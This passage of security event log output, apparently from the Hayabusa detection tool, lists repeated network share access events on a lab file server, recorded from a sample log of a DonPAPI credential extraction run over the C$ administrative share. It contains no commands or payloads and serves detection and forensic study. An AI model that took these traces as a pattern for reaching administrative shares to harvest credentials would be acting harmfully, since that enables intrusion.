Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.627 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.658 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
